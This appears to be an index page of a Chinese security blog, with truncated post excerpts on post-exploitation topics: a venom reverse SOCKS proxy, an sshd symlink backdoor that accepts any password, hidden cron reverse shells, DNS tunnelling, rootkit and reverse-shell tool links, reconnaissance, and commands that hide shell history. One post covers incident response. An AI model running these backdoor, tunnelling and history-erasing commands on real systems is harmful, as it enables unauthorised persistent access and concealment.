利用venom反向socks代理

2022年01月05日  No comment

目标边界: 12.12.12.12   agent.exe ‐rhost 198.118.119.118 ‐rport 9999 攻击机: 198.118.119.118  ./admin_linux_x86 ‐lport 99990x0­1 攻击机监听./admin_linux_x86 ‐lport 99990x­2 靶机反向连接agent.e
阅读全文 »

Linux经典后门

2021年12月28日  No comment

ssh软连接 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555; 经典后门。直接对sshd建立软连接,之后用任意密码登录即可。 ssh root@x.x.x.x -p 5555https://www.cnblogs.com/sevck/p/6495884.html 设置隐藏任务计划反弹shell(crontab -l;printf &quo
阅读全文 »

Linux应急响应

2021年12月28日  No comment

https://github.com/al0ne/LinuxCheck/ who                     查看当前登录用户(tty本地登陆  pts远程登录) w       &nb
阅读全文 »

SSH转发

2021年12月27日  No comment

本地访问127.0.0.1:port1就是host:port2(用的更多) ssh -CfNg -L port1:127.0.0.1:port2 user@host    #本地转发 访问host:port2就是访问127.0.0.1:port1 ssh -CfNg -R port2:127.0.0.1:port1 user@host   &
阅读全文 »

brootkit

2021年12月25日  No comment

https://github.com/cloudsec/brootkit https://blog.csdn.net/whatday/article/details/54298501
阅读全文 »

反弹shell管理工具

2021年12月24日  No comment

https://github.com/WangYihang/Reverse-Shell-Manager https://github.com/WangYihang/Platypus/releases/ 使用说明https://platypus-reverse-shell.vercel.app/quick-start/
阅读全文 »

DNS隧道工具

2021年12月24日  No comment

iodine https://github.com/yarrick/iodine  dnscat2 Type:dns解析类型 A CNAME MX TXT 分为直链模式和中继模式 gem install ecdsa gem install salsa20 gem install sha3 gem install trollop https://rubygems.org/gems
阅读全文 »

Linux主机信息收集

2021年12月22日  No comment

last   多数运维会接入内网登录系统这时候便可获取部分内网ip进而对内网IP段进行画像 Ifconfig -a/arp -a/netstat -anopt/ss -nt ifconfig -a 查看内网ip 网卡 网关    route -n   内网路由情况,也能为内网网络拓扑提供一定的信息 IPtabl
阅读全文 »

Linux提权后总结

2021年08月10日  No comment

发行类型 版本在命令前加空格 命令不会被记录 [空格]set +o history   设置命令不被记录 set -o history       恢复记录命令 history -d [num]      删除指定命令行 num指左边序号标示 echo
阅读全文 »

Nginx设置开机自启

2021年06月19日  No comment

  以centos为例  进入/etc/init.d/目录,新添加nginx文件#!/bin/sh # # nginx - this script starts and stops the nginx daemon # # chkconfig:   - 85 15 # description: &n
阅读全文 »